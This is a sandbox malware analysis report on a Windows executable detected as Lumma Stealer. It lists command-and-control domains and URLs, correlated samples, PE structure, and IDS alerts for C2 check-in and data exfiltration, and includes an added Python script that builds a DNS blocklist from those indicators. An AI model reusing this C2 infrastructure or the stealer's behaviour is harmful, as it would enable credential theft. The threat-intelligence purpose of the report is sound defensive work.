awake-weaves.cyou | false | | high
immureprech.biz | false | | high
https://tacitglibbr.biz/api | false | | high
deafeninggeh.biz | false | | high
tacitglibbr.biz | false | | high
debonairnukk.xyz | false | | high
diffuculttan.xyz | false | | high
effecterectz.xyz | false | | high
wrathful-jammy.cyou | false | | high
URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/jLI | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://tacitglibbr.biz/ | wf1Ps82LYF.exe, 00000000.00000002.1620621391.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1512232664.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578306795.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010E3000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/M | wf1Ps82LYF.exe, 00000000.00000003.1536686995.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536997543.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/pi | wf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/pil | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.ecosia.org/newtab/ | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/sZ7 | wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://tacitglibbr.biz/apizT | wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://tacitglibbr.biz/d | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://tacitglibbr.biz:443/apiDQ | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://tacitglibbr.biz:443/apil | wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/apill | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz:443/apin.txtPK | wf1Ps82LYF.exe, 00000000.00000002.1617971497.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz:443/api | wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.50.161 | tacitglibbr.biz | United States | 13335 | CLOUDFLARENET US | false
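The network tables above are the indicators a responder would act on, but the extraction left each row with its cells fused (the Malicious flag glued onto the domain, the detection percentage glued onto the URL). The following Python is an added example, not part of the Joe Sandbox report: it parses rows in exactly that fused form, normalises the contacted domains and URL hosts into one blocklist, and runs the blocklist over a few DNS log lines. The table rows are copied from this report; the DNS log lines, their format and the label set beyond "malware" are constructed assumptions.

```python
"""Build a DNS blocklist from the flattened Joe Sandbox network tables above
and run it over DNS log lines. Added example for this page, not Joe Sandbox
code; table rows are copied from the report, log lines are constructed."""
import re
from urllib.parse import urlsplit

# URL table rows as extracted: <url><detection>%<scanner><label>
URL_ROWS = [
    "https://tacitglibbr.biz/jLI100%Avira URL Cloudmalware",
    "https://tacitglibbr.biz:443/apiDQ100%Avira URL Cloudmalware",
    "https://tacitglibbr.biz/sZ7100%Avira URL Cloudmalware",
]
# Contacted-domain rows as extracted: <name><malicious flag>. The sample's
# fallback C2 domains carry Malicious=false here; that column is the
# sandbox's reputation verdict at analysis time, not ground truth.
DOMAIN_ROWS = [
    "sordid-snaked.cyoufalse", "awake-weaves.cyoufalse", "immureprech.bizfalse",
    "https://tacitglibbr.biz/apifalse", "deafeninggeh.bizfalse",
    "tacitglibbr.bizfalse", "debonairnukk.xyzfalse", "diffuculttan.xyzfalse",
    "effecterectz.xyzfalse", "wrathful-jammy.cyoufalse",
]

# Only "malware" occurs on this page; "clean"/"unknown" are assumed labels.
URL_ROW = re.compile(
    r"^(?P<url>\S+?)(?P<pct>\d{1,3})%(?P<scanner>.+?)(?P<label>malware|clean|unknown)$")
DOMAIN_ROW = re.compile(r"^(?P<name>.+?)(?P<malicious>true|false)$")


def parse_url_row(row):
    """Split one fused URL row. Anchoring the percentage on '%' keeps a URL
    that itself ends in digits (.../sZ7) from being eaten by the detection."""
    m = URL_ROW.match(row)
    if not m:
        raise ValueError(f"unparseable URL row: {row!r}")
    return {"url": m["url"], "detection": int(m["pct"]),
            "scanner": m["scanner"], "label": m["label"]}


def parse_domain_row(row):
    """Split one fused domain row into its name and Malicious flag."""
    m = DOMAIN_ROW.match(row)
    if not m:
        raise ValueError(f"unparseable domain row: {row!r}")
    return {"name": m["name"], "malicious": m["malicious"] == "true"}


def hostname(name):
    """A row's name may be a bare domain or a full URL (with port); reduce
    either to a lowercase host without a trailing dot."""
    if "://" in name:
        return urlsplit(name).hostname.lower()
    return name.lower().rstrip(".")


def build_blocklist(url_rows=URL_ROWS, domain_rows=DOMAIN_ROWS):
    """Union of hosts from both tables, deduplicated."""
    hosts = {hostname(parse_url_row(r)["url"]) for r in url_rows}
    hosts |= {hostname(parse_domain_row(r)["name"]) for r in domain_rows}
    return frozenset(hosts)


def matches(qname, blocklist):
    """True if qname equals a blocked host or is a subdomain of one. Matching
    on label boundaries stops 'nottacitglibbr.biz' from matching."""
    labels = qname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


# Constructed DNS log (not from the report): "<time> <client> <qname> <qtype>"
DNS_LOG = """\
17:15:02 10.0.0.5 tacitglibbr.biz A
17:15:02 10.0.0.5 fp2e7a.wpc.phicdn.net A
17:15:03 10.0.0.7 nottacitglibbr.biz A
17:15:04 10.0.0.7 cdn.sordid-snaked.cyou AAAA
17:15:05 10.0.0.9 awake-weaves.cyou. A
"""


def scan_dns_log(log=DNS_LOG, blocklist=None):
    """Return (client, qname) for every query that hits the blocklist."""
    if blocklist is None:
        blocklist = build_blocklist()
    hits = []
    for line in log.splitlines():
        _, client, qname, _ = line.split()
        if matches(qname, blocklist):
            hits.append((client, qname))
    return hits


if __name__ == "__main__":
    for client, qname in scan_dns_log():
        print(f"{client} -> {qname}")
```

Two caveats the tables themselves make visible: the contacted IP 104.21.50.161 sits in CLOUDFLARENET (ASN 13335) and the correlation list further down shows the same domain resolving to 172.67.164.37 in other analyses, so the IP is shared edge infrastructure and the domains, not the address, are the indicators worth blocking or hunting on; and the Contacted Domains table carries Malicious=false next to domains that the URL scanner flags as malware, so the flag should not be read as a clean bill.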
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576242
Start date and time: 2024-12-16 17:14:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wf1Ps82LYF.exe (renamed because the original name is a hash value)
Original Sample Name: 9b88afc4511d0fe8aca6080d34f2dd66.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target wf1Ps82LYF.exe, PID 7588, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: wf1Ps82LYF.exe
Time | Type | Description
11:15:01 | API Interceptor | 8x Sleep call for process: wf1Ps82LYF.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.50.161NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                      4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  fp2e7a.wpc.phicdn.netYPgggL1oh7.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  SPHINX.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  AV4b38nlhN.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 192.229.221.95
                                                                                                  msimg32.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 192.229.221.95
                                                                                                  YBkzZEtVcK.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  xGW5bGPCIg.exeGet hashmaliciousCryptbotBrowse
                                                                                                  • 192.229.221.95
                                                                                                  SOjID1t3un.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  CrSpoof.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  tacitglibbr.bizNYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                  • 172.67.164.37
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  UUH30xVTpr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 172.67.164.37
                                                                                                  4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 104.21.50.161
                                                                                                  yYJUaOwKa8.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.164.37
                                                                                                  Wqd6nMOfmG.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  • 172.67.164.37
                                                                                                  hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.50.161
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUShttps://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdjGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.142.119
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | IMAKBWPY.exe | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | JIKJCBEX.exe | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | YTRNYRXC.exe | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | fm2r286nqT.exe | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | NYMPo215Qd.exe | Get hash | malicious | LummaC, Stealc | Browse | • 104.21.50.161
 | qvkwOs4JfC.exe | Get hash | malicious | LummaC, Stealc | Browse | • 104.21.50.161
 | InvoiceNr274728.pdf.lnk | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | • 104.21.50.161
 | 54FApnc7eR.exe | Get hash | malicious | LummaC | Browse | • 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | Browse | • 104.21.50.161
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949104699097024
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: wf1Ps82LYF.exe
File size: 1'884'672 bytes
MD5: 9b88afc4511d0fe8aca6080d34f2dd66
SHA1: 4d0abcc2f053e2b17d3064f65dffc171f873b043
SHA256: 5d2b5f0d8b9fbfb231b99678bb332bee9cfef9aa6c2ed7e994dbabbb83639004
SHA512: f4e9c5bbbb27eb07c192226390833714b82b94cfa4a9fb6b0e0a75ece7b51eb009b9c2bdc3b70c2ee77a56b7496c1251c50888471cddf32a2f307eaf134b1490
SSDEEP: 49152:5Ir6N++PRgxCGbe4K9FTTH/e3p7IJIZ1KFvGTPeMXPgnktG:t+PHbe4qe5601ssGM/Nt
TLSH: CD953313DAC3FE21CF3A2A70B9F65600E9B775909F23CDA7A10111509CBD2B6786F588
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................J...........@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a9000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x51000 | 0x24800 | 31914c174ef76f0252f1fe30ab037430 | False | 0.9974983946917808 | data | 7.9796014648206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x2b0 | 0x400 | b1e85b1cd09caefc2d43268be72ef161 | False | 0.3603515625 | data | 5.183452444303608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x54000 | 0x2b0000 | 0x200 | 6c69d6903976db20fee19a3923628a88 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
avxzjrga | 0x304000 | 0x1a4000 | 0x1a3c00 | 25b29ba72184c95aca3a75685cabffcb | False | 0.9949793403811793 | data | 7.954101941370097 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vgfnourc | 0x4a8000 | 0x1000 | 0x400 | e1b9adf886ef24e078e0ac11c1e53c7b | False | 0.787109375 | data | 6.202987373109183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a9000 | 0x3000 | 0x2200 | 60797d02aa3b01561581d7086f49f3ec | False | 0.05813419117647059 | DOS executable (COM) | 0.7384836028064443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T17:15:00.530872+0100 | 2058230 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) | 1 | 192.168.2.8 | 59301 | 1.1.1.1 | 53 | UDP
2024-12-16T17:15:02.013493+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.013493+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.821315+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.821315+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.115519+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.115519+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.875796+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.875796+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:06.573219+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:06.573219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:07.438616+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:08.827724+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49709 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:08.827724+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:11.598593+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.8 | 49710 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:11.598593+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 104.21.50.161 | 443 | TCP
